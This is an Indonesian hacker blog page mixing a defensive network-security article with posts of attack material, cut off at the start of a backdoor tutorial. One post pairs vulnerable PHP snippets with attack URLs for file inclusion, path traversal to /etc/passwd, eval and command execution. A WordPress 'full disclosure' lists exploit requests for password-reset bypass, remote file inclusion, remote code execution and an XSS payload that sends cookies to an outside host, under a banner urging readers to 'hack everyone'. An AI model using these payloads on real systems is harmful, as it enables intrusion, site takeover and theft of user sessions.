_____ __ _____ ___ _____ ___ _____ _____ _____ _____ _____ _____ _____ _____ ____ _____ _ _ _ _____ | __|| | | | ||_ | | | || | | | __|| __|| __ || | || __|| __ | | || __| | \ | || | | || | | | __|| |__ | | | _| |_ | | | ||_ | |__ || __|| -|| | || __|| -| |- -||__ | | | || | || | | || | | | |_____||_____| \___/ |_____||_|___| |_| |_____||_____||__|__| \___/ |_____||__|__| |_____||_____| |____/ |_____||_____||_|___| I DONT WANT TO BE FAME , I DONT WANT TO BE ANY EZINE , I JUST WANT TO SHARE KNOWLEDGE
, ----. ~ Fuck full-disclosure - - ` ~ Fuck the security industry ,__.,' \ ~ Keep 0days private .' *` ~ Hack everyone you can and then hack some more / | | / **\ ~ Blend in. . / ****. ~ Get trusted. | mm | ****| ~ Trust no one. \ | ****| ~ Own everyone. ` ._______ \ ****/ ~ Disclose nothing. \ /`---' ~ Destroy everything. \___( ~ Take back the scene /~~~~\ ~ Never sell out, never surrender. / \ ~ Get in as anonymous, Leave with no trace. / | \ ~ This your Fucking IP | | \ ~ This your Fucking ISP , ~~ . |, ~~ . | |\ ~ FUCK OFF I've got enough friends !!!! ( |||| ) ( |||| )(,,,)` ( |||||| )-( |||||| ) | ^ ( |||||| ) ( |||||| ) |'/ ( |||||| )-( |||||| )___,'- ( |||| ) ( |||| ) ` ~~ ' ` ~~ '

[ Blog ]

[ History ]


Apakah mereka jagoan ?

apa yang mereka fikirkan ketika mereka menyusup masuk ke dalam system configurasi situs yang seharusnya mereka tidak memiliki hak akses tersebut ?
ketika mereka sudah dalam berada dalam system, mereka berfikir " akulah jagoan, penguasa system victim" dan apalah persetan dengan bualan omongannya.
mereka sengaja menganti index.php setiap directorynya, mendaur ulang dengan system error page, mengambil data" baik menghapus data" .
mereka tidak pernah berfikir jika sang admin victim web tersebut harus beusaha keras lagi untuk mengganti security dan memperbaiki setiap halaman yang telah di injak injak oleh penguasa system yang sok jagoan. sang attacker hanya meninggalkan sebuah coretan" yang tidak bermanfaat bagi sang admin . mereka kadang suka meninggalkan pesan error " THIS SITE HAVE BEEN OWNED BY bla..bla..bla.. " <-- artian kata itu sangat arogan sekali , mereka seperti sudah mengetahui unsur" kelemahan victim web tersebut.
mereka menyimpan namanya untuk di sombongkan kepada teman" nya.
:)
dan alhasil nama" mereka tercantum di berkas google ataupun search engine lainnya.
mereka bangga dengan nama" nya.
selidik ku selidik aku berjelajah ke google untuk mencari nama" hacker tersebut.
dan ternyata aku menemukan celah keamanan mereka.
ternyata mereka sendiri tidak bisa menutup celah kekurangan dirisendiri.
foto,alamat,nama,no tlpn,email aku dapatkan dari hasil pencarianku di google.
ternyata mereka dulu sering mejeng" di forum atau media webchat seperti : friendster,facebook,myspace , dan yang lainnya.
secara terang - terangan mereka perlihatkan wajah aslinya,
mereka tidak pernah tau suatu saat mereka akan dicari dan tuntut untuk mengganti semua kerugian beberapa situs yang telah mereka injak injak .
secara mayoritas mereka lahir dari golongan media webchat.
wah wah .
gimana yah klo aku laporkan kepada pihak yang berwajib :)
semua keterangan" mereka .


mengapa aku menulis pesan seperti itu .
karena aku adalah salah satu korban dari mereka.
tapi aku bersyukur situs saya mereka kuasai karena mereka masih peduli denga situs saya yang sangat usang :)

s

Labels:


On 2/25/09 at 12:33 PM


Meningkatkan Sekuriti Jaringan Komputer Anda

Secara umum, masalah sekuriti di Internet dapat dipandang dari dua sisi penting. Sisi pertama adalah integritas data yang dikirimkan melalui jaringan Internet (sebut saja integritas pengiriman data) dan sisi berikutnya adalah tingkat sekuriti dalam jaringan komputer itu sendiri (kita sebut sekuriti jaringan internal).

Integritas Pengiriman Data

Pada saat kita mengirimkan data melalui jaringan Internet, kita selalu ingin agar data yang kita kirimkan tersebut sampai di tujuan dengan selamat dan tidak mengalami campur tangan pihak lain. Syarat ini menjadi jauh lebih utama apabila data yang kita kirimkan tergolong kategori data rahasia.

Pada saat kita kirimkan, data tersebut akan melalui berbagai jenis komputer, router, atau gateway dan melintasi berbagai macam media fisik komunikasi. Kita mempertaruhkan integritas data kepada keanekaragaman di atas. Tentunya kita tidak mungkin memeriksa tingkat sekuriti di setiap hop/titik yang dilalui oleh data tersebut karena tingkat sebaran dan kepemilikan hop yang sangat beraneka ragam. Salah satu solusi yang dapat diterapkan adalah enkripsi data. Tujuan utama dari solusi ini adalah mencegah terjadinya curi-dengar (eavesdropping) terhadap data yang kita kirimkan maupun yang kita terima. Jika seorang "eavesdropper" melakukan tindakan curi-dengar, ia akan memperoleh data-data yang terenkripsi saja sehingga tidak mencerminkan isi data sebenarnya.

Proses enkripsi data bisa diterapkan di lapisan (layer) tertentu dari protokol TCP/IP. Seperti telah diketahui, protokol TCP/IP memiliki 4 lapisan guna menunjang proses komunikasi data. Lapisan tersebut terdiri dari Application Layer, Transport Layer, Internet Layer, Network Access Layer. Kita bisa menerapkan proses enkripsi di masing-masing lapisan. Masing-masing implementasi dari lapisan-lapisan tersebut sebagai berikut :

Network Access Layer

Bentuk nyata dari lapisan ini adalah bagian hardware dari sebuah komputer. Bila akan menerapkan proses enkripsi di lapisan ini, kita harus mencari atau menciptakan hardware khusus yang menangani masalah enkripsi data. Beberapa lembaga penelitian telah mulai menggali lebih dalam kemungkinan penciptaan hardware yang memiliki kemampuan enkripsi data yang lebih baik.

Internet Layer

Dalam protokol TCP/IP, Internet layer diimplementasikan dalam Internet Protocol (IP). Protokol ini berbentuk software yang mengatur tentang pengalamatan dan proses routing. Protokol ini telah diberikan nilai tambah tersendiri untuk meningkatkan sekuriti data yang dikirimkannya. Nilai tambah tersebut masing-masing adalah Authentication Header dan Encapsulating Security Payload.

Authentication Header (AH) adalah sebuah header tambahan yang bertujuan memberikan jaminan atas syarat integritas data yang dikirimkan dan syarat keaslian sumber pengirim beserta data yang dikirimkan (authentication). Header ini berada di posisi paling akhir dari header-header pada lapisan IP dan sebelum header Encapsulating Security Payload (ESP). AH juga bisa menjamin non-repudiation dari sebuah data apabila penerapan AH menggunakan algoritma kriptografi tertentu. Non-repudiation adalah syarat di mana pihak penerima bisa membuktikan bahwa pihak pengirim benar-benar mengirimkan data yang diterima pihak penerima meskipun pihak pengirim tidak mengakuinya. Informasi yang terkandung di dalam AH ini dihasilkan dari perhitungan seluruh bagian dari datagram IP (mulai dari header IP, header protokol di atas IP, hingga data aslinya). Bila pihak penerima menerima datagram yang tidak otentik berdasarkan penilaian AH, datagram tersebut akan diabaikan. Mekanisme ini bisa digunakan untuk mencegah aksi-aksi IP spoofing. Aksi ini bertujuan agar penyusup bisa berpura-pura sebagai pihak pengirim dengan cara menebak datagram yang akan dikirimkan.

Encapsulating Security Payload (ESP) adalah sebuah mekanisme tambahan pada datagram IP yang bertujuan untuk meningkatkan confidentiality dan integritas data. Confidentiality adalah suatu syarat di mana penerima mengetahui arti yang sebenarnya dari data yang dikirimkan sedangkan pihak lain yang tidak diharapkan tidak akan mengerti arti yang sebenarnya dari data yang dikirimkan. Hasil implementasi ESP adalah sebuah datagram IP yang bagian datanya telah terenkripsi. ESP diletakkan di posisi paling akhir dari serangkaian IP header dan sebelum bagian pertama data. ESP memiliki header tersendiri yang disebut ESP Header. Untuk modus paling aman, format ESP Header adalah awal dari header tersebut tidak dienkripsi sedangkan sisa header dan seluruh bagian data dienkripsi.

|<---- Tidak dienkripsi ---->|<----- Dienkripsi ------>| +------------+-------------------+------------+-----------------------+ | IP Header | IP Header lainnya | ESP Header | data yang dienkripsi | +------------+-------------------+------------+-----------------------+

Bagian header yang tidak dienkripsi memberikan keterangan tentang cara mendekripsi dan memproses data yang dienkripsi tersebut. ESP dapat diterapkan pada setiap jenis transport layer (TCP, UDP) yang digunakan. Mekanisme ini lebih banyak diterapkan untuk modus Tunnel. Tunnel adalah sebuah modus pada pengiriman data yang lebih bersifat privat dan khusus melalui jaringan Internet. Intranet, terutama yang digunakan untuk menghubungkan cabang-cabang yang tersebar di berbagai daerah, adalah salah satu pengguna modus Tunnel.

Transport Layer

Dalam konsep TCP/IP, secara umum transport layer dibagi menjadi dua, yaitu Transmission Control Protocol (TCP) dan User Datagram Protocol (UDP). Pada lapisan ini, belum begitu banyak mekanisme yang dikembangkan untuk menambahkan aspek sekuriti. TCP sendiri sudah memiliki rutin-rutin yang cukup kompleks dalam mengolah data yang diterima.

Application Layer

Lapisan ini adalah lapisan yang langsung berhubungan dengan user. Apa yang dilihat oleh user pada layar monitor komputer adalah tampilan dari Application Layer tersebut.

Teknik-teknik yang digunakan untuk mengenkripsi data pada lapisan aplikasi ini telah banyak berkembang dan mencapai hasil yang cukup memuaskan. Berbagai macam jenis algoritma enkripsi telah dikembangkan dan beberapa di antaranya telah menjadi standar internasional. Beberapa algoritma yang cukup terkenal adalah Data Encryption Standard (DES), Triple-DES, RC2/RC4, International Data Encryption Algorithm (IDEA) dan Skipjack. Algoritma DES dan IDEA telah banyak diterapkan di dunia sedangkan algoritma lainnya telah dipatenkan. Dari algoritma-algoritma di atas, dibuatlah berbagai macam software pengenkripsi. Salah satu yang terkenal dan bersifat shareware adalah Pretty Good Privacy (PGP).

Penerapan software enkripsi pada Application layer bisa bermacam-macam. Salah satunya, kita bisa mengenkripsi isi dari eletronic mail. Selain itu, kita juga bisa mengenkripsi file-file yang akan kita berikan kepada orang lain melalui FTP. Pesan-pesan elektronik pun dapat kita enkripsi terlebih dahulu sebelum kita kirimkan. Setelah sampai di tujuan, penerima dapat mendekripsi pada layer yang sama apa yang ia terima sehingga mencerminkan arti sebenarnya.

Khusus dalam HyperText Transfer Protocol (HTTP), telah dikembangkan berbagai macam mekanisme pengamanan data yang ditransfer melalui protokol ini. Protokol HTTP menjadi tulang punggung dalam World Wide Web (WWW) dan kita lebih sering melihatnya dalam bentuk home page di situs-situs Internet. Beberapa perusahaan di dunia telah memanfaatkan WWW sebagai salah satu saran penghubung kepada konsumen dan pelanggan mereka. Bahkan WWW telah pula digunakan sebagai penghubung antar bagian perusahaan mereka sendiri dalam teknologi Intranet. Untuk menjamin integritas data yang dikirimkan, para pakar kriptografi telah mengembangkan beberapa mekanisme enkripsi untuk protokol tersebut. Dua dari berbagai mekanisme yang ada di Internet adalah SecureHTTP (SHTTP) dan Secure Socket Layer (SSL). SSL dikembangkan oleh Netscape dan telah diimplementasikan di beberapa situs di Internet. Dengan adanya mekanisme-mekanisme ini, pengiriman nomor rekening, kata kunci rahasia, dan data-data rahasia lainnya bisa dilakukan di Internet dengan lebih aman.

Sekuriti Jaringan Internal

Sisi selanjutnya adalah keamanan dari jaringan komputer internal. Pada saat kita memutuskan untuk membangun sebuah jaringan komputer yang terhubung ke Internet, saat itu pula kita telah mengambil resiko untuk berhadapan dengan ancaman-ancaman penyusupan dan pengrusakan data dari Internet. Oleh karena itu, kita harus mempersiapkan jaringan komputer kita untuk menghadapi serangan-serangan dan ancaman-ancaman tersebut.

Masalah sekuriti jaringan internal ini meliputi beberapa aspek. Untuk mudahnya, masalah tersebut dapat dipecah menjadi dua bagian yaitu bagian software-hardware dan bagian user.

Bagian software-hardware

Dalam membangun sebuah jaringan komputer, kita memiliki kebebasan dalam merancang, baik dari struktur jaringan maupun konfigurasi hardware dan jenis program yang akan digunakan. Struktur jaringan yang akan direalisasikan dapat dirancang sedemikian rupa sehingga memiliki tingkat sekuriti yang tinggi. Sebagai contoh, kita bisa membuat sebuah jaringan perimeter atau lebih dikenal dengan sebutan DeMilitary Zone (DMZ) yang memberikan layanan dan akses seperlunya saja kepada Internet. Jaringan perimeter merupakan jaringan yang langsung berhadapan dengan Internet setelah melalui sebuah router atau gateway. Dari segi hardware, kita dapat menentukan spesifikasi hardware yang tepat sesuai kebutuhan dan tugas yang akan diberikan kepada hardware tersebut. Sebagai contoh, untuk menjadi sebuah mail server yang menangani 100 buah mailing list atau lebih, tentunya kebutuhan akan jumlah memori/RAM dan swap memory yang disediakan menjadi melonjak. Selain itu, bila terdapat usaha-usaha pengrusakan pada mail server tersebut dengan berbagai cara seperti mail bombing, setidak-tidaknya mail server kita masih bisa bertahan.

Pada bagian software, kita bisa menggunakan sistem operasi dan software-software yang telah dikenal kehandalannya. Hal ini bertujuan supaya sistem operasi maupun software yang kita gunakan mampu menahan gempuran atau serangan dari Internet dan tidak sampai merusak hardware. Selain itu, sebaiknya kita selalu menggunakan software-software keluaran terbaru. Untuk itu, kita harus lebih sering memantau perkembangan software yang kita gunakan tersebut.

Setelah kita memilih sistem operasi dan software yang akan digunakan, kita harus mengkonfigurasi sistem operasi dan software tersebut agar tidak memiliki celah yang bisa dieksplorasi oleh para penyusup dari Internet. Apabila kita tidak waspada, hole-hole yang sudah umum pun bisa muncul pada sistem jaringan komputer kita. Berikut adalah terdapat beberapa titik penting pada sistem operasi berbasis Unix yang perlu mendapat perhatian.

Perintah-perintah berawalan huruf "r"

Perintah-perintah berawalan huruf "r" (rlogin, rsh, rwho, dlsb) perlu ditinjau ulang dari segi kebutuhan. Apabila kita tidak memerlukan fungsi-fungsi perintah di atas, matikan saja. Jika memang memerlukannya, kita harus lebih hati-hati dalam mengkonfigurasi file-file yang berhubungan dengan setting perintah tersebut. Untuk perintah-perintah tersebut, file konfigurasi yang penting adalah /etc/hosts.equiv.

File-file dengan suid

File dengan konfigurasi suid adalah file (umumnya berupa program) yang apabila dieksekusi akan memiliki hak setingkat dengan pemilik (owner) dari file tersebut. Sebagai contoh, perintah "chpass" termasuk jenis file suid. Perintah "chpass" ini berguna untuk mengubah data-data tentang user seperti: nama lengkap, alamat kantor, alamat rumah, dsb. Pada dasarnya, perintah "chpass" melakukan perubahan pada file yang berisi user password dari komputer tersebut. Oleh karena itu, perintah tersebut memerlukan konfigurasi suid root karena file yang berisi user password hanya bisa diubah oleh root sendiri atau memiliki hak akses setara dengan root.

File-file dengan suid root harus dibatasi jumlahnya sesuai kebutuhan. Bila tidak, para penyusup bisa memanfaatkan kelemahan ini untuk memperoleh hak akses setara root pula. Seringkali para penyusup menyiapkan backdoor melalui file-file suid tersebut sehingga saat penyusup ingin kembali masuk ke dalam sistem, ia bisa menggunakan backdoor tersebut. Salah satu langkah penanggulangannya adalah dengan membuat daftar file suid di saat setelah konfigurasi sistem operasi selesai dan melakukan pemeriksaan secara rutin yang kemudian dibandingkan dengan daftar file pertama.

File & directory permission

Pada saat mengkonfigurasi sistem operasi, file permission dan directory permission sebaiknya ikut dikonfigurasi lebih lanjut selain konfigurasi awal yang telah disediakan dari pencipta sistem operasi tersebut. Batasi user hanya untuk bisa memiliki akses penuh pada home directory user tersebut.

Network File System (NFS)

NFS memungkinkan kita membuat file system yang berada di komputer lain seolah-olah berada di komputer kita. Tetapi, apabila kita kurang hati-hati dalam mengkonfigurasinya, hal ini menjadi makanan empuk bagi para perusak. Kita harus memilih direktori mana saja yang perlu dibuat menjadi terbuka terhadap komputer lain. Hak akses juga harus menjadi perhatian sehingga kita dapat menempatkan file-file pada porsi yang sebenarnya. Perbaikan-perbaikan (patches) untuk NFS juga telah tersedia di Internet karena NFS memiliki beberapa titik kelemahan.

majordomo

Majordomo adalah salah satu software yang menangani mailing list dan sudah tersebar sangat luas. Gunakan selalu majordomo versi di atas 1.91 karena versi di bawah 1.91 memiliki bugs yang cukup berbahaya.

Fingerd

Utilitas ini sudah cukup terkenal sebagai salah satu alat utama dalam Internet worm yang sempat melumpuhkan jaringan Internet di tahun 1988. Hingga saat ini, utiliti finger masih sering digunakan sebagai langkah awal memantau sistem yang akan disusupi. Meskipun perbaikan-perbaikan terhadap bug yang ada di fingerd telah dilakukan, sebaiknya layanan ini ditutup untuk akses dari luar sehingga perintah finger hanya bisa dilakukan sebatas sistem atau komputer itu.

File /etc/inetd.conf

File /etc/inetd.conf ini berisi konfigurasi service-service yang dijalankan oleh inetd. Sebaiknya file ini diatur pada mode 600 dan dimiliki oleh root. Selain itu, sebaiknya kita menutup layanan-layanan networking yang tidak kita perlukan. Konfigurasi awal dari instalasi sistem operasi seringkali membuka layanan-layanan networking yang tidak kita butuhkan.

Anonymous FTP

Anonymous FTP disediakan bagi user umum untuk mendapatkan file-file yang kita publikasikan. Hal yang perlu diperhatikan dari sudut pandang sekuriti adalah konfigurasi hak akses yang diberikan pada direktori-direktori yang kita publikasikan. Selain itu, selalu gunakan versi terbaru untuk FTP daemon yang kita gunakan. Versi FTP daemon yang sudah lama memiliki perintah-perintah jarak jauh untuk meletakkan file ataupun membaca file yang berada di direktori selain direktori FTP tersebut.

SMTP Server

SMTP server adalah server yang bertugas mengatur pengantaran electronic mail dari pengirim ke penerima. SMTP server yang sering digunakan adalah sendmail. Sendmail ini telah terkenal kehandalannya tetapi juga memiliki bugs yang bisa digunakan untuk mendapatkan hak akses setara root. Untuk meminimalkan risiko ini, selalu gunakan versi terbaru dari sendmail. Kita juga bisa menaikkan tingkat proses logging sampai tingkat/level 9. Pada tingkat tersebut, sendmail logger akan mendeteksi usaha-usaha eksploitasi terhadap kelemahan sendmail.

HTTP Server / Web Server

Baru-baru ini, Web server merupakan salah satu titik eksploitasi yang paling terkenal. Dengan mengeksploitasi bugs yang ada di web server ini, para penyusup bisa mendapatkan hak akses setara root. Hal ini mengakibatkan data-data home page yang ada di web server itu diacak-acak dan diganti sesuka hati penyusupnya. Untuk mencegah terjadinya hal ini, ambil beberapa langkah pencegahan berikut: Gunakan selalu HTTP daemon yang terbaru dan telah diketahui belum memiliki bugs. Contoh: NCSA httpd versi 1.5.

Hilangkan script-script yang tidak perlu yang memerlukan akses ke sistem file. Umumnya, script-script tersebut disebut dengan Common Gateway Interface (CGI) script. Lakukan konfigurasi sebaik-baiknya terhadap CGI script yang kita perlukan sebagai penghubung antara user dan server. Gunakan filter untuk mendeteksi input yang diberikan user, terutama terhadap karakter-karakter yang berpotensi untuk merusak seperti: \n \r ( . , / ; ~ ! ) > | ^ & $ ` < %.

Selain dari itu, kita bisa menggunakan software firewall untuk membatasi akses dan melakukan pemantauan terhadap aliran transfer data. Software firewall ada yang bersifat shareware dan komersial. Cara instalasi, penggunaan dan konfigurasinya tidak dibahas pada tulisan ini karena topik tersebut cukup luas

Dalam suatu sistem yang terproteksi cukup ketat, seringkali kita tidak bisa mengakses komputer kita dari jarak jauh. Untuk memenuhi kebutuhan tersebut tanpa harus mengorbankan tingkat sekuriti sistem, kita bisa menempuh dua cara. Cara pertama adalah mengubah program yang bertugas menerima akses langsung dari luar sehingga kita bisa memonitor, mencatat maupun membatasi akses yang diberikan. Contoh program yang menerima akses langsung dari Internet adalah telnetd. Cara kedua adalah menyiapkan hardware khusus yang bertindak sebagai perantara antara user dan komputer. Fungsi dari hardware khusus ini tidak berbeda jauh dengan software yang diubah pada cara pertama.

Bagian User

Jika sisi software telah dikonfigurasi dengan baik, sisi user perlu mendapat perhatian. Seringkali, user pada suatu sistem memilih password yang mudah ditebak, seperti "Komputer", "Memori", kombinasi nama user, nama perusahaan penghasil meja komputer, merek monitor/keyboard/casing komputer, dsb. Selain itu, jangan menuliskan password pada kertas atau benda apa pun. Tentunya sudah cukup banyak tip untuk membuat password yang baik. Jika dipandang perlu, konfigurasi password user bisa diatur agar user diharuskan memperbarui passwordnya secara periodik. Cara lain yang bisa dilakukan adalah menjalankan program yang berfungsi memecahkan kode password pada file password yang Anda miliki. Program semacam ini cukup banyak di Internet dan tersedia untuk berbagai platform sistem operasi. Pada sistem operasi Unix, program yang cukup terkenal adalah Crack. Dengan menggunakan program ini, kita dapat mengetahui apakah user telah memilih password dengan baik.

Langkah lain yang bisa kita lakukan adalah mencari dan mendapatkan software-software khusus yang berhubungan dengan masalah sekuriti. Contohnya: COPS (software penganalisa kelemahan dalam password dan konfigurasi file), SATAN (software penganalisa jarak jauh terhadap usaha-usaha penyusupan dari luar), TCP-Wrapper (software yang bertugas mencatat beberapa aktivitas transfer data), Tripwire (mirip dengan TCP-Wrapper), dsb. Dengan adanya software ini, kita bisa mengetahui seberapa tinggi tingkat sekuriti sistem jaringan komputer kita.

Penanggulangan

Jika terjadi usaha-usaha penyusupan ke dalam sistem jaringan komputer, kita harus secepat mungkin menutup akses dari mana usaha-usaha penyusupan tersebut. Beberapa ciri dasar dari usaha penyusupan adalah usaha login yang gagal terus-menerus, sumberdaya komputer yang terserap habis akibat satu atau lebih layanan networking, munculnya file-file aneh yang asal-usulnya tidak diketahui, dan jebolnya password dari beberapa user. Bila penyusup telah berhasil memasuki sistem komputer dan bisa memperoleh hak akses setara root, bisa dipastikan sistem komputer kita sudah tidak aman. Mengapa? Karena pada umumnya penyusup telah membuat backdoor yang cukup aman dan tersembunyi kecuali kita mengetahui setiap titik dari backdoor yang dibuat oleh penyusup tersebut dan kita bisa memusnahkannya. Bila kita tidak bisa menemukan backdoor tersebut, jalan teraman adalah instalasi ulang sistem operasi yang ada di komputer tersebut L.

Sebagai system administrator yang baik, kita seharusnya selalu membaca log file yang banyak dihasilkan oleh program-program yang dieksekusi di komputer kita. Dengan membaca log file, kejadian-kejadian yang tidak diinginkan dapat dideteksi lebih dini.

Akhir kata, "tiada gading yang tak retak". Kita harus selalu waspada dengan kesalahan-kesalahan yang mungkin kita buat baik dengan sengaja maupun tidak, yang secara langsung atau tidak langsung dapat mengancam sekuriti sistem jaringan komputer kita. Kita juga harus selalu meningkatkan tingkat keterampilan dan keahlian kita karena usaha-usaha eksplorasi yang dilakukan oleh para hacker, cracker dan phreaker selalu lebih maju.

Daftar Sumber Dokumen dan Situs di Internet yang berkaitan dengan masalah sekuriti di Internet

Dokumen:

Computer Security Basics, Deborah Russell & G.T. Gangemi Sr., © 1991 O'Reilly & Associates, Inc. Pratical Unix Security, Simon Garfinkel & Gene Spafford, © 1991 O'Reilly & Associates, Inc.

Labels:


at 12:27 PM


Kesalahan Fatal penulisan scripts php

Kesalahan Fatal penulisan scripts php

Beberapa kesalahan penulisan scripts php yang dapat berakibat fatal.

======
kasus 1
======
[scripts]
$page = $_GET[page];
include($page);

[attack]
http://victim.com/file.php?page=[evil scripts]

======
kasus 2
======
[scripts]
header( “Content-Type: application/octet-stream” );
header( “Content-Length: ” . filesize($_GET['file'] ) );
header( “Content-Disposition: inline; filename=\”$_GET[file]\”");
readfile($_GET['file'] );

[attack]
http://victim.com/file.php?file=index.php

=======
kasus 3
=======
[scripts]
$fp = fopen(”/path/{$_GET['filename']}.txt”, ‘r’);

[attack]
http://victim.com/file.php?filename=../../../etc/passwd

======
kasus 5
======
[scripts]
eval($_GET[ev]);

[attack]
http://victim.com/file.php?ev=include($_GET[irv]);&irv=[evil code]

==========
kasus 6
==========
[scripts]
passthru($_GET[cmd]);

[attack]
http://victim.com/file.php?cmd=ls -al

-----------------------------------------------------------------
penulisan script php akan berakibat fatal pada web site anda
maka dari itu tutupilah celah keamanan dengan menuliskan script php yang benar.
jika tidak, maka situs anda tidak akan luput dari serangan para defacer :)



Labels:


at 12:22 PM


Project finished, Wordpress Vulnerability full disclosure

-------------------------------------------------------
| |
| WORDPRESS |
| |
>-----------------------------------------------------< |-----------------------------------------------------|
|[+]Author : ELV1N4 |
|[+]contact : ELV1N@doyan.cc |
|[!]Blog : http://elv1n4.blogspot.com |
|[-]Gretzz : #SolpotCreW,#nyubicrew, |
|#noscan, #hitamputih, cyberdos family |
|-----------------------------------------------------| ------------------------------------------------------- ------------------------------------------------------
-> WORDPRESS <-
------------------------------------------------------

|----------> apa itu WORDPRESS ?
| |
| |
| |
| |-----> Vulnerability On wp-login.php
| |
| |
| |-----> Vunlerabilty On Wp mygallery
| |
| |
| |-----> Vulnerabilty On WP-Syntax
| |
| |
| |-----> Vulnerabilty On plugin by Fredrik Fahlstad.
| |
| |
| |-----> Vulneabilty On templates.php
| |
| |-----> Vulnerabilty On Plugin Sniplets 1.1.2
|
|---------> Penuntup

------------------------------------------------------
-> END OF FILES <-
------------------------------------------------------

------------------------------------------------------
APA itu WORDPRESS ?
------------------------------------------------------
Wordpress adalah salah satu aplikasi atau script berbasis web yang dapat anda gunakan untuk membangun sebuah website atau blog. Wordpress digunakan oleh sebagian besar pengguna web karena instalasinya yang sangat mudah bahkan untuk yang masih pemula sekalipun. Ryan Boren dan Matt Mullenweg adalah tokoh di balik Wordpress. Mereka telah memimpin proyek ini sejak tahun 2004 yang pada waktu itu masih bernama B2 / Cafelog. Kemudian menggunakan nama Wordpress hingga sekarang. Kebanyakan pakar internet marketing sangat menganjurkan untuk menggunakan aplikasi Wordpress ini sebagai basis web, karena kehebatan Wordpress dalam bertarung di Search Engine (mesin pencari) sudah terbukti dan tidak diragukan lagi. Hal lain yang membuat Wordpress ini sangat diminati adalah karena Wordpress ini gratis. Setiap orang dapat menginstall aplikasi Wordpress ini dengan mudah tanpa harus mengeluarkan uang. Disamping itu support sistemnya sangat bagus. Setiap keluhan pengguna ditanggapi dengan cepat dan akurat.tetapi jangan sangka ke indahan Wordpress dapat berubah jadi mimpi buruk :D wadoww . mimpir buruk itu apaan yah heuheue :P .banyaknya ancaman" kaum peretas semakin meningkat , nah itu yang menjadi mimpi buruk para pengguna WP, khususnya pengguna Wp untuk bussines . :D mari kita liat berbagai vulnerabilty dalam Wp ------------------------------------------------------
Vulnerability On wp-login.php
------------------------------------------------------
threat :: Remote admin reset password
threat level :: Medium
Discover :: Laurent Gaffié
Wp Version :: 2.8.3
------------------------------------------------------
var/ww-home/Wp/wp-login.php?action=rp&key=[keyID] itu path untuk mereset password baiklah kita melihat source wp-login.php mungkin ada sedikit kesalahan penulisan script yang akan berakbit fatal
######################################################
case 'resetpass' : case 'rp' : $errors = reset_password($_GET['key']); if ( ! is_wp_error($errors) ) { wp_redirect('wp-login.php?checkemail=newpass'); exit(); } wp_redirect('wp-login.php?action=lostpassword&error=invalidkey'); exit(); break; ######################################################
nah berarti string $key dapat memungkinkan kita reset password tanpa reconfirmasi ^_^ contoh :: var/www-home-wordpress/wp-login.php?action=rp&key[]= nah dalam path diatas bila kita eksekusi , maka password akan ter reset secara otomatis , tanpa comfirmasi apapun ^_^

------------------------------------------------------
Vunlerabilty On Wp mygallery
------------------------------------------------------
threat :: Remote File inclusion ( RFI )
Bugs :: myGallery threat
level :: High
Discover :: GolD_M
Wp Version :: 1.2.1
------------------------------------------------------
beberapa content / plugin pada Wp memang sensitif untuk di injeksikan oleh Serangan Remote , pengulangan barisan (SQLi) , Atau buffer overflow. yu kita liat cara bagaimana terjadinya bugs pada plugin Mygallery pada Wp ######################################################### # #
if (!$_POST){ # $mypath=$_GET['myPath']; <---------[+1] # # } # else { # $mypath=$_POST['myPath'];<---------[+2] # # # } # require_once($mypath.'/wp-config.php');<---------[+3]
##########################################################

karena terjadinya include($page . '.php'); pada /wp-Config.php maka tag dalam Mygallery mempunyai Akses untuk mengluarkan file ( .php ) var/ww-home/wordpress/wp-content/plugin/mygallery/myfunctions/mygallerybrowser.php?myPath= ^eVilscript^ ------------------------------------------------------
Vulnerabilty On WP-Syntax
------------------------------------------------------
threat :: Remote command execution ( RCE )
Bugs :: Wp-syntax
threat level :: High
Discover :: Inj3ct0r
Wp Version :: 0.9.1
------------------------------------------------------
GET /wp/2.7/wp-content/plugins/wp-syntax/test/index.php?test_filter[wp_head][99][0]=session_start&test_filter[wp_head][99][1]=session_id&test_filter[wp_head][99][2]=system HTTP/1.0 Host: localhost Cookie: PHPSESSID=dir Connection: close or var/www-home/wordpress/wp-content/index.php?test_filter[wp_head][99][]=session_start&test_filter[wp_head][99][0]=session_id&test_filter[wp_head][99][1]=base64_decode&test_filter[wp_head][99][2]=assert&q=phpinfo();exit; ------------------------------------------------------
Vulnerabilty On plugin by Fredrik Fahlstad. ------------------------------------------------------
threat :: Duplicate Admin / Renew Password
Bugs :: N/a
threat level :: High Risk
Discover :: irk4z ( polandia ) Wp Version :: 2.6.1 ------------------------------------------------------
Pembuatan Duplikasi Admin ?? apa bisa ? caranya -> var/www-home/wordpress/wp-login.php?action=register

-> register dengan nama admin
-> isikan form
login: admin
email: email kamu

-> var/www-home/wordpress/wp-login.php?action=lostpassword

-> tuliskan Email kamu yang tadi

-> check password di email kamu

-> login dengan password yang baru ^_^

------------------------------------------------------
Vulneabilty On templates.php
------------------------------------------------------
threat :: XSS
Bugs :: wp-admin/templates.php
threat level :: Medium
Discover :: My favorite Michael Daw's <3

src="'var/www-home/wordpress/wp-admin/templates.php?file=" src="%27%27" onerror="javascript: var s=(document.location.toString().charAt(6)); var url=(%27http:%27%2Bs%2Bs%2B%27michaeldaw.org%27); document.location=url%2Bs%2B%27evil.php?%27%2Bdocument.cookie">'


=======================================================
var/www-home/wordpress/wp-admin/templates.php?file=%3Cimg%20src=''onerror=javascript:alert(document.cookie);%3E


contoh diatas adalah cookies stealer XSS

kembangkan serangan XSS lain
masih banyak yang lebih sensitif dalam XSS
gunakan cheat sheet XSS lainnya yah

------------------------------------------------------
Vulneabilty On Plugin Sniplets
------------------------------------------------------
threat :: Multiple Vulnerabilty
Bugs :: /modules/syntax_highlight.php
threat level :: Medium
Discover :: N/a
Wp Version :: N/a
------------------------------------------------------

RFI
---

var/www/home/wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath= ^evilscript^


XSS
----
var/www/home/wordpress/wp-content/plugins/sniplets/view/sniplets/warning.php?text=%3Cscript%3Ealert(%22XSS%22)%3C/script%3E

RCE
----

var/www/home/wordpress/wp-content/plugins/sniplets/modules/execute.php?text=%3C?php%20system(%22ls%22);


------------------------------------------------------
Penutup
------------------------------------------------------
Masih banyak lagi Bugs" yang terdapat pada Wordpress , ^_^
Hacking its Easy, Secure Its Hard

------------------------------------------------------
-> END OF FILES <-
------------------------------------------------------

Labels:


at 11:50 AM


malam sepi cuma bisa bikin tutorial backdoor

-------------------------------------------------------
| |
| BACKDOORING |
| |
>-----------------------------------------------------<
|-----------------------------------------------------|
|[+]Author : ELV1N4 |
|[+]contact : ELV1N@doyan.cc |
